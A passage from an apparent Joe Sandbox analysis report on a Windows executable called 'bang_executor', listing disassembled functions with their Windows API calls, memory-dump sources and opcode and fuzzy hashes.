                                        • GetProcessAffinityMask.KERNEL32(00000000,?,004F31C7), ref: 004F3198
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Process$AffinityCurrentMask
                                        • String ID:
                                        • API String ID: 1231390398-0
                                        • Opcode ID: 8e39744f55d44cdf1895d88494fac9170180b91cd9e11f87f510eb38bea323af
                                        • Instruction ID: 3835307cf0f539e64cfc0a49ff19ee2125e5eaaa2bb241588c11b84e4e7a9bc5
                                        • Opcode Fuzzy Hash: 8e39744f55d44cdf1895d88494fac9170180b91cd9e11f87f510eb38bea323af
                                        • Instruction Fuzzy Hash: 0BE0D832B00109679F098FA49D098FB73DDDA5924631481BAA603D3300FA38DE0946A8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004F28AB Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 004F28D4
                                        • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,004F1309,Crypt32.dll,00000000,004F1383,00000200,?,004F1366,00000000,00000000,?), ref: 004F28F4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: DirectoryLibraryLoadSystem
                                        • String ID:
                                        • API String ID: 1175261203-0
                                        • Opcode ID: ca03e40f1c47517b0abeb997c302188547d9ca1e33fd01c827f91ba73626be86
                                        • Instruction ID: e1763fb9d677b537213cb5b0bf1b9e2358fa615da57cc2c3802997d86d56fc24
                                        • Opcode Fuzzy Hash: ca03e40f1c47517b0abeb997c302188547d9ca1e33fd01c827f91ba73626be86
                                        • Instruction Fuzzy Hash: D4F0E935900108ABCB10DF65CD09DDFB7FCEF4D741F00006AB605D3140CA74EA498B68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004FCD3F Relevance: 3.0, APIs: 2, Instructions: 31comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GdiplusShutdown.GDIPLUS(?,?,?,?,0051505D,000000FF), ref: 004FCD7D
                                        • OleUninitialize.OLE32(?,?,?,?,0051505D,000000FF), ref: 004FCD82
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: GdiplusShutdownUninitialize
                                        • String ID:
                                        • API String ID: 3856339756-0
                                        • Opcode ID: d0b0571ea50107ed80eeabff7e586d530cd52c06022b00e96c3ec9e1d1fa0c39
                                        • Instruction ID: c554f4f6e46dcc276918d728f8de8114e73a63e6acbd6032356d23f77056fbe1
                                        • Opcode Fuzzy Hash: d0b0571ea50107ed80eeabff7e586d530cd52c06022b00e96c3ec9e1d1fa0c39
                                        • Instruction Fuzzy Hash: 21F08976604544EFD710DF55DC05F5AFBB8FB5D720F00426AE415C3760DB34A905CA94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004FC34D Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 004FC36E
                                        • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 004FC375
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: BitmapCreateFromGdipStream
                                        • String ID:
                                        • API String ID: 1918208029-0
                                        • Opcode ID: 479d67353646ee67fdf701365dcd4d5fab56966fb4919ae7c956878f0bebe1a5
                                        • Instruction ID: bbda99cf22f8dd8de5a4cee79de70635e2d844f664e9193459d801a80df0592d
                                        • Opcode Fuzzy Hash: 479d67353646ee67fdf701365dcd4d5fab56966fb4919ae7c956878f0bebe1a5
                                        • Instruction Fuzzy Hash: 80E06D7180460CEBCB10DF99C544BAEBBF8EF05350F10C01BE98693200D274AE449B55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005051AC Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005051CA
                                        • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 005051D5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                        • String ID:
                                        • API String ID: 1660781231-0
                                        • Opcode ID: 413b4ef27ff43fd7a6fdd8e0db7986649c031156559bb4a0bca23231608c9563
                                        • Instruction ID: 176cf14be66d3cf3978126e40c3901b3db2524feab013db323d4f25205758fc0
                                        • Opcode Fuzzy Hash: 413b4ef27ff43fd7a6fdd8e0db7986649c031156559bb4a0bca23231608c9563
                                        • Instruction Fuzzy Hash: FAD0A978948F0368CC2026B0282B79F2F40BF927B47B01A46E4618A4C2FA128845EE62
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004E1341 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ItemShowWindow
                                        • String ID:
                                        • API String ID: 3351165006-0
                                        • Opcode ID: 3c30b0e5d287879a3a1d8ad0e897fc5784edb573aec76d67aef8b990cd9d1940
                                        • Instruction ID: 70b910e6a57d83adf16be9ec0685ecc9e4837c3b62d78057cee90a4b392b590e
                                        • Opcode Fuzzy Hash: 3c30b0e5d287879a3a1d8ad0e897fc5784edb573aec76d67aef8b990cd9d1940
                                        • Instruction Fuzzy Hash: C4C0123A05C208BECB010BB0DC09C6ABBA8ABAA216F11CA48F0A6C1060C339C014EB61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004E1323 Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,?), ref: 004E1331
                                        • KiUserCallbackDispatcher.NTDLL(00000000), ref: 004E1338
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherItemUser
                                        • String ID:
                                        • API String ID: 4250310104-0
                                        • Opcode ID: 9f5e6dbc8216a57d948de1d0fcb915d6a8c542e9b21cb4bdec980ec23809f8c7
                                        • Instruction ID: d0cdb441aaf675ff4852d3f89ed7e8e7a1878e06233b104937c688d886a744cd
                                        • Opcode Fuzzy Hash: 9f5e6dbc8216a57d948de1d0fcb915d6a8c542e9b21cb4bdec980ec23809f8c7
                                        • Instruction Fuzzy Hash: A9C04C7A40C244BFCB015BB09D0CC6FBFB9ABA9315F50D989B5A581020C7358414EB11
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004E1B63 Relevance: 1.8, APIs: 1, Instructions: 311COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID:
                                        • API String ID: 431132790-0
                                        • Opcode ID: ed9ca02b811dfc6ea3c9089f8d33454416d205b2ac3955cb16e6629b939060b7
                                        • Instruction ID: f7fba318beecd8a558b245e5d15d334523789a8d47841393e9f9d8d85efd2ec2
                                        • Opcode Fuzzy Hash: ed9ca02b811dfc6ea3c9089f8d33454416d205b2ac3955cb16e6629b939060b7
                                        • Instruction Fuzzy Hash: FEC1B834A402909BDF15DF2AC884BAE7BA1AF59311F1801BBEC06DB3A6C7789944CB55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004E147C Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 004E1483
                                          • Part of subcall function 004E6AE8: __EH_prolog3.LIBCMT ref: 004E6AEF
                                          • Part of subcall function 004EEE0F: __EH_prolog3.LIBCMT ref: 004EEE16
                                          • Part of subcall function 004E668F: __EH_prolog3.LIBCMT ref: 004E6696
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID:
                                        • API String ID: 431132790-0
                                        • Opcode ID: 29cfeb1bee1485a3a78f72bce3bd3269d86ec55be8438ed391b27c235b6d1664
                                        • Instruction ID: 62cab097b1a1f44c78a28d5e6e3192ea3bf19ebe321c322f208853d5b6692370
                                        • Opcode Fuzzy Hash: 29cfeb1bee1485a3a78f72bce3bd3269d86ec55be8438ed391b27c235b6d1664
                                        • Instruction Fuzzy Hash: 704104B1A063808ECB14DF6A94802D97BE2BF59300F0801BEEC5DCF29AD7755255CB66
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004F5617 Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID:
                                        • API String ID: 431132790-0
                                        • Opcode ID: d742788036b85e132c7010c0d0b94c7033ff1153321939404c98093a15878a92
                                        • Instruction ID: 54dbf378f791e6f6372298ddf4b09935078846bc9d46243ddd3d0a23e564b575
                                        • Opcode Fuzzy Hash: d742788036b85e132c7010c0d0b94c7033ff1153321939404c98093a15878a92
                                        • Instruction Fuzzy Hash: 032127B1E40A169BDB14AFB48C4962F7AE8BB45304F04013BEB15EB2C1E7749800879D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050D2E8 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0050D348
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AddressProc
                                        • String ID:
                                        • API String ID: 190572456-0
                                        • Opcode ID: 3b1b970ab51681246e0e315550180b6e54858fc7893e6cbe6164e8ac51b909de
                                        • Instruction ID: cd29b1b12a9d78a22aa6ac10fc962a38ed81023791eb2670fe727d334fcceaa2
                                        • Opcode Fuzzy Hash: 3b1b970ab51681246e0e315550180b6e54858fc7893e6cbe6164e8ac51b909de
                                        • Instruction Fuzzy Hash: 24110D376006259BDB319F6CEC409DE77B5FF8536071A4A20FD15AB1D4D630DC0196E2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004EAB81 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID:
                                        • API String ID: 431132790-0
                                        • Opcode ID: bb6218d27aab3b5bc60f9a33e71714af6707efbf54a746c3110aa0ca5e4777a6
                                        • Instruction ID: 099cb7a574e596d138d27df72afa9b5e9c2601ee357ad4f2541d9b16095b340e
                                        • Opcode Fuzzy Hash: bb6218d27aab3b5bc60f9a33e71714af6707efbf54a746c3110aa0ca5e4777a6
                                        • Instruction Fuzzy Hash: C601C83AD005AA5BCF11EE66C8929EFB772BF44705B11411EFE1167381C739AC10869A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004E668F Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 004E6696
                                          • Part of subcall function 004F11A5: __EH_prolog3.LIBCMT ref: 004F11AC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID:
                                        • API String ID: 431132790-0
                                        • Opcode ID: cf2ccfbd7e2563a7ead07ca1e4534523bd3905ddb66f5f6d8000d93c3fa5ef68
                                        • Instruction ID: b3877392a1de0d85be0cb890ceb2dd79a8015c226ecd0381dc3cff85f0acb6ac
                                        • Opcode Fuzzy Hash: cf2ccfbd7e2563a7ead07ca1e4534523bd3905ddb66f5f6d8000d93c3fa5ef68
                                        • Instruction Fuzzy Hash: B1012174805748CAE715FBB682566EDFBE46F64304F10054FA56A43292CBF82704C76A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050BC8E Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000,?,?,?,00506A24,?,0000015D,?,?,?,?,00507F00,000000FF,00000000,?,?), ref: 0050BCC0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: 85a5c1656b697a50c9915b752ce90db643311f8cb20e7786f51baf372cce7849
                                        • Instruction ID: 438f97742d079a08998cbcb4e07284ab543a7f4cd5595342d0211d0f326476bb
                                        • Opcode Fuzzy Hash: 85a5c1656b697a50c9915b752ce90db643311f8cb20e7786f51baf372cce7849
                                        • Instruction Fuzzy Hash: F5E06D3920162396FB2127659D85B9F3E58FFA23A4F150121EC0AA62D2CF65CC0182E5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004EAFD0 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                        Download Yara Rule
                                        APIs
                                        • FindCloseChangeNotification.KERNELBASE(?,?,?,004EAF75,08ADEBCE,00000000,0051517A,000000FF,?,004E8882,?,?), ref: 004EAFEB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ChangeCloseFindNotification
                                        • String ID:
                                        • API String ID: 2591292051-0
                                        • Opcode ID: 76137c8aeb19f4c6e1fd5c19ee24f8924dfe9522caca1fc80ef19fb6739691dc
                                        • Instruction ID: 525cdc4329e30c62a223b4a66e72972051ffb5568d489c22a21224602fa5c66f
                                        • Opcode Fuzzy Hash: 76137c8aeb19f4c6e1fd5c19ee24f8924dfe9522caca1fc80ef19fb6739691dc
